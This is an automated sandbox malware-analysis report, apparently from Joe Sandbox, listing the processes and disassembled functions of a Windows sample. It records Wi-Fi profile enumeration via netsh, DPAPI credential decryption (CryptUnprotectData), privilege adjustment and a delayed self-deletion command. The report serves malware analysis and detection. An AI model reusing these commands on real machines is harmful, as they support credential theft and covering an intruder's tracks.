                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:netsh wlan show profiles
                                                                                        Imagebase:0x7ff742760000
                                                                                        File size:96'768 bytes
                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                        Imagebase:0x7ff73ec00000
                                                                                        File size:36'352 bytes
                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                        Imagebase:0x7ff7f2ed0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0x7ff6e6d80000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:netsh wlan show networks mode=bssid
                                                                                        Imagebase:0x7ff742760000
                                                                                        File size:96'768 bytes
                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:findstr "SSID BSSID Signal"
                                                                                        Imagebase:0x7ff73ec00000
                                                                                        File size:36'352 bytes
                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x7ff7f2ed0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0x7ff6e6d80000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:timeout /t 3
                                                                                        Imagebase:0x7ff792cd0000
                                                                                        File size:32'768 bytes
                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:16.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:100%
                                                                                          Total number of Nodes:29
                                                                                          Total number of Limit Nodes:2

                                                                                          Executed Functions

                                                                                          Function 00007FFD9B8A6089 Relevance: 1.9, APIs: 1, Instructions: 374libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 3160d0f9c9c909625b5b1a0001e80c8e7b15bb654874e6ccd6e3b31b19d01e76
                                                                                          • Instruction ID: 04f42a37dec90a412a1f93f10070b5b876e1bbbd67ec2aef0a262ebb81852def
                                                                                          • Opcode Fuzzy Hash: 3160d0f9c9c909625b5b1a0001e80c8e7b15bb654874e6ccd6e3b31b19d01e76
                                                                                          • Instruction Fuzzy Hash: 1CB1E370A09A0D8FDB69DF98D895AB8BBF0FF59310F14017ED04ED7266DA35A842CB40
                                                                                          Function 00007FFD9B8AB115 Relevance: 1.9, APIs: 1, Instructions: 371COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6ec9c6ec7a87bbf06f10770f26c88346d949beec0c5a634e3493a4873c9ffa9
                                                                                          • Instruction ID: db517f47346fa90656f642f40ad0c7909726ea66bc1daa02f2ee060e9015fe46
                                                                                          • Opcode Fuzzy Hash: f6ec9c6ec7a87bbf06f10770f26c88346d949beec0c5a634e3493a4873c9ffa9
                                                                                          • Instruction Fuzzy Hash: CBC13A70E0965D8FDB98DF98D894BEDBBF1FB59300F1041AAD04DE3291DA346985CB50
                                                                                          Function 00007FFD9B8A7A21 Relevance: 1.8, APIs: 1, Instructions: 251encryptionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CryptDataUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 834300711-0
                                                                                          • Opcode ID: 24a1daa970d61c548236eb872d2a49d15f704c17a5a843f59b78cbcfa220203b
                                                                                          • Instruction ID: c02d63e5384a83e686f5fcee56947f7e89271b1cd0755f328d51caad971ed29c
                                                                                          • Opcode Fuzzy Hash: 24a1daa970d61c548236eb872d2a49d15f704c17a5a843f59b78cbcfa220203b
                                                                                          • Instruction Fuzzy Hash: F3815E74E08A5D8FDB98DF18C855BE9B7F1FB59300F0042AAD44DE3291DB74A985CB41
                                                                                          Function 00007FFD9B8AED85 Relevance: 1.7, APIs: 1, Instructions: 213COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 187 7ffd9b8aed85-7ffd9b8aed91 188 7ffd9b8aed9c-7ffd9b8aeefd AdjustTokenPrivileges 187->188 189 7ffd9b8aed93-7ffd9b8aed9b 187->189 193 7ffd9b8aef05-7ffd9b8aef75 188->193 194 7ffd9b8aeeff 188->194 189->188 194->193
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: 51ce368ca4b531b40401ed797833857841df8392e52f932cbc57d7e5636b9d40
                                                                                          • Instruction ID: 98228cd8351a78e758bd8445ed66082e030133d42cb2ae745520c31b929d6f7b
                                                                                          • Opcode Fuzzy Hash: 51ce368ca4b531b40401ed797833857841df8392e52f932cbc57d7e5636b9d40
                                                                                          • Instruction Fuzzy Hash: 8C611470908A1D8FDB98DF68D894BE9BBF1FB59311F1041AED44DE3291DB34A985CB40
                                                                                          Function 00007FFD9B8A9C62 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 197 7ffd9b8a9c62-7ffd9b8aeefd AdjustTokenPrivileges 201 7ffd9b8aef05-7ffd9b8aef75 197->201 202 7ffd9b8aeeff 197->202 202->201
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: ded50faa41577a782d790e083bbc8e357bc3b633ae97e9d9419ededb8ce186dc
                                                                                          • Instruction ID: 44fadc085513d8c26a6e135740a71a189471ef385407fe7064bbd60566e63df2
                                                                                          • Opcode Fuzzy Hash: ded50faa41577a782d790e083bbc8e357bc3b633ae97e9d9419ededb8ce186dc
                                                                                          • Instruction Fuzzy Hash: B6510170A08A1C8FDB98DF58D884BE9BBF1FB69311F1041AED44EE3251DA30A985CF40
                                                                                          Function 00007FFD9B8AB305 Relevance: 1.7, APIs: 1, Instructions: 184nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 205 7ffd9b8ab305-7ffd9b8ab455 NtQueryInformationToken 212 7ffd9b8ab457 205->212 213 7ffd9b8ab45d-7ffd9b8ab4a9 205->213 212->213
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: 224fa9458b12feb50081e303ac65a368d84235a22f34bc2bc252790f50c5673b
                                                                                          • Instruction ID: 72954d499d34bd66b65dfcd4c2eb874564d2977239286e5136ebd31916da58dc
                                                                                          • Opcode Fuzzy Hash: 224fa9458b12feb50081e303ac65a368d84235a22f34bc2bc252790f50c5673b
                                                                                          • Instruction Fuzzy Hash: A6511570908A5C8FDF98DF58D894BE9BBF1FB6A310F1081AED44DE3251DA70A985CB40
                                                                                          Function 00007FFD9B8A9D2B Relevance: 1.7, APIs: 1, Instructions: 179nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 215 7ffd9b8a9d2b-7ffd9b8ab455 NtQueryInformationToken 219 7ffd9b8ab457 215->219 220 7ffd9b8ab45d-7ffd9b8ab4a9 215->220 219->220
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: 13787be2129c8b0bb3be638ed6dc4cfa43137ef8b9494671dc90eda4752ed484
                                                                                          • Instruction ID: 7adee41f9ddd0e65387edaa8fcdf00bd74afcd588c72bc728f02e9fb314e729a
                                                                                          • Opcode Fuzzy Hash: 13787be2129c8b0bb3be638ed6dc4cfa43137ef8b9494671dc90eda4752ed484
                                                                                          • Instruction Fuzzy Hash: 93510270A08A1C8FDB98DF58D894BE9BBF1FB69310F1091AED04DE3251DA30A985CF44
                                                                                          Function 00007FFD9B8AE3F9 Relevance: 1.6, APIs: 1, Instructions: 137nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 289 7ffd9b8ae3f9-7ffd9b8ae4e3 NtClose 293 7ffd9b8ae4e5 289->293 294 7ffd9b8ae4eb-7ffd9b8ae529 289->294 293->294
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 2de7fee5732fa3a96827d35aa47aef076ab2bc63998720130c2d95957f24aa22
                                                                                          • Instruction ID: c37a521534bbb77364ae549ea2071f0d05ca9497ab670384065d0b17bf009b79
                                                                                          • Opcode Fuzzy Hash: 2de7fee5732fa3a96827d35aa47aef076ab2bc63998720130c2d95957f24aa22
                                                                                          • Instruction Fuzzy Hash: 92414C70E08A4C8FDB59DF98D894BEDBBF0FF5A310F1041AAD049D7252DA709885CB51
                                                                                          Function 00007FFD9B8A9D22 Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 296 7ffd9b8a9d22-7ffd9b8ae4e3 NtClose 300 7ffd9b8ae4e5 296->300 301 7ffd9b8ae4eb-7ffd9b8ae529 296->301 300->301
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 8d76b67d40a5a6e5fb26ce6a070330046d117c0bf3396e99c5f29e2f77210e49
                                                                                          • Instruction ID: b885a9ace11a76ed2c7ead75e0118a4f071b4c87de6f8234808c007bdd4a966f
                                                                                          • Opcode Fuzzy Hash: 8d76b67d40a5a6e5fb26ce6a070330046d117c0bf3396e99c5f29e2f77210e49
                                                                                          • Instruction Fuzzy Hash: 7241F570A08A1C8FDB98DF98D495BEDBBF0FB59311F10416AD009E7251DA70A886CB50
                                                                                          Function 00007FFD9B8A7B6D Relevance: 1.6, APIs: 1, Instructions: 118encryptionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 303 7ffd9b8a7b6d-7ffd9b8a7c57 CryptUnprotectData 308 7ffd9b8a7c59 303->308 309 7ffd9b8a7c5f-7ffd9b8a7cd2 303->309 308->309
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CryptDataUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 834300711-0
                                                                                          • Opcode ID: 918f8475181cffbc634d364f6290edfcb7f6237af6e55cf29b6cde9c080c3e1a
                                                                                          • Instruction ID: f21ded51305259db0eb8e1f2801902dd6f1270cd0c0e98e2cf0079f0fa0ba0cf
                                                                                          • Opcode Fuzzy Hash: 918f8475181cffbc634d364f6290edfcb7f6237af6e55cf29b6cde9c080c3e1a
                                                                                          • Instruction Fuzzy Hash: 2D41DB30E18A1D8FDBA8EF18C894BE9B7B1FB59300F0042A9D45DE3255DB74AA84CF41
                                                                                          Function 00007FFD9B8B502A Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 447 7ffd9b8b502a-7ffd9b8b505f 449 7ffd9b8b5066-7ffd9b8b50ad call 7ffd9b8a04e8 447->449 450 7ffd9b8b5061 447->450 454 7ffd9b8b50b2-7ffd9b8b50f2 449->454 450->449 457 7ffd9b8b50f9-7ffd9b8b5130 454->457 458 7ffd9b8b50f4 454->458 460 7ffd9b8b5286-7ffd9b8b5290 457->460 458->457 461 7ffd9b8b5135-7ffd9b8b5140 460->461 462 7ffd9b8b5296-7ffd9b8b52c0 460->462 463 7ffd9b8b5147-7ffd9b8b5198 461->463 464 7ffd9b8b5142 461->464 468 7ffd9b8b519a-7ffd9b8b51be 463->468 469 7ffd9b8b51c0-7ffd9b8b51c2 463->469 464->463 470 7ffd9b8b51c5-7ffd9b8b51d2 468->470 469->470 471 7ffd9b8b51d8-7ffd9b8b520c 470->471 472 7ffd9b8b5279-7ffd9b8b5283 470->472 476 7ffd9b8b520e 471->476 477 7ffd9b8b5213-7ffd9b8b5255 471->477 472->460 476->477 479 7ffd9b8b5257 477->479 480 7ffd9b8b525c-7ffd9b8b5278 477->480 479->480 480->472
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9.
                                                                                          • API String ID: 0-1376035022
                                                                                          • Opcode ID: 6cae8bd1075a446d41c5bd7e14dbef1ee663030e4b84fb1d723a323e2f23824b
                                                                                          • Instruction ID: 522f122a9399ce6c33ac93464f3365da053b7fe3ea2bd3f9c555dfa34f14f226
                                                                                          • Opcode Fuzzy Hash: 6cae8bd1075a446d41c5bd7e14dbef1ee663030e4b84fb1d723a323e2f23824b
                                                                                          • Instruction Fuzzy Hash: 50910870E0961D8FDB95EBA8C465BECB7B1FF59300F1041A9D01DE72A5CA356985CF40
                                                                                          Function 00007FFD9B8A304C Relevance: 1.4, Instructions: 1370COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f991c36003597cbf27bc25c1821c8cb2fc85a3c938b1e6917dceb3271b31497
                                                                                          • Instruction ID: 6077ec7855c6ed172eb43b58ff61d4aaaeeed5009dcd32b97f22e6ef70acc759
                                                                                          • Opcode Fuzzy Hash: 4f991c36003597cbf27bc25c1821c8cb2fc85a3c938b1e6917dceb3271b31497
                                                                                          • Instruction Fuzzy Hash: 2692B430719A4D8FDB95EF68C865AB937E1FF59300B1500B9E45ECB2A6DE29EC02C711
                                                                                          Function 00007FFD9B8AF356 Relevance: .3, Instructions: 346COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a36cb2a87955f98635ca20818a819e100bf4860b9de8475776b5e3a32f597072
                                                                                          • Instruction ID: 462c4a0bae1d80b3a8a5b4c72431800a4eb4cf2836658c170a249cc42cd5225c
                                                                                          • Opcode Fuzzy Hash: a36cb2a87955f98635ca20818a819e100bf4860b9de8475776b5e3a32f597072
                                                                                          • Instruction Fuzzy Hash: 6BD1E970E1A51D8FEBA4EB58C865BA8B7B1FF59300F5101F9D00DE35A2DA34AA85CF50
                                                                                          Function 00007FFD9B8B0607 Relevance: .3, Instructions: 327COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 740b3dcc46b171211d447c5cbe51f02e456941c8f3dcb5e57700ea3651ad63aa
                                                                                          • Instruction ID: ec2454bdd121744ea8323e6b0d6c6d7f6517975c26ce9991bb1caf9f006b2d21
                                                                                          • Opcode Fuzzy Hash: 740b3dcc46b171211d447c5cbe51f02e456941c8f3dcb5e57700ea3651ad63aa
                                                                                          • Instruction Fuzzy Hash: DCD1F970A1952D8FDBA9EB64C865BE8B3B1FF59304F1145E9D00EE3291DA35AA81CF40
                                                                                          Function 00007FFD9B8B1BFB Relevance: .3, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2154a9e328ca3e7fb76f94eec79a70ce5ac9888d0c09573b9235b0c2bb845004
                                                                                          • Instruction ID: 30edacef64e171b30910e476240a013d3d3e838404539226dd3c108df33c0a2b
                                                                                          • Opcode Fuzzy Hash: 2154a9e328ca3e7fb76f94eec79a70ce5ac9888d0c09573b9235b0c2bb845004
                                                                                          • Instruction Fuzzy Hash: 30A1FB70E0962D8FDBA8EF54C8A4BE9B7B1FF59301F5101A9D00DE72A1DA346A85CF40
                                                                                          Function 00007FFD9B8B229C Relevance: .1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90232a928cf35067c58fbeffc901d900e202ddb0c727af21bad354fff0f4f202
                                                                                          • Instruction ID: a45c382303a2eeb3b28382e3c99f51c9ac5e988865abe8a2125dc3adda373e9e
                                                                                          • Opcode Fuzzy Hash: 90232a928cf35067c58fbeffc901d900e202ddb0c727af21bad354fff0f4f202
                                                                                          • Instruction Fuzzy Hash: D731A530E0952D8FDBA5EF98D890AECB7B5EF59300F5150A9D00DE7265CA34AE81CF44
                                                                                          Function 00007FFD9B8A6029 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a66e727355a5f387511e088fa0e8c780172afa7a6a86cd589a5b6af0f991e60b
                                                                                          • Instruction ID: f25603e881699d96b7fb9fc04a0e12645dc7e58a53473361bbe37ca60ba6f64a
                                                                                          • Opcode Fuzzy Hash: a66e727355a5f387511e088fa0e8c780172afa7a6a86cd589a5b6af0f991e60b
                                                                                          • Instruction Fuzzy Hash: CDD0C931A05519CECB24EEA4E0025FAF331FB86315F1015BBD519E39A0C732E9218BC4

                                                                                          Non-executed Functions

                                                                                          Function 00007FFD9B8A7285 Relevance: .6, Instructions: 591COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 81e3ee2c02ec50c9262b928b6d8aeeb77bb94d6606450d9f934b92126f792c0c
                                                                                          • Instruction ID: 7179eaf2ff923f949839dee7635493529a663cce3e6189f677980a12723a0149
                                                                                          • Opcode Fuzzy Hash: 81e3ee2c02ec50c9262b928b6d8aeeb77bb94d6606450d9f934b92126f792c0c
                                                                                          • Instruction Fuzzy Hash: 33129F34A19A8D8FEB68DF68C855BE93BE1FF59310F10417ED84EC7292DA34A941CB41
                                                                                          Function 00007FFD9B8A6A99 Relevance: .2, Instructions: 250COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
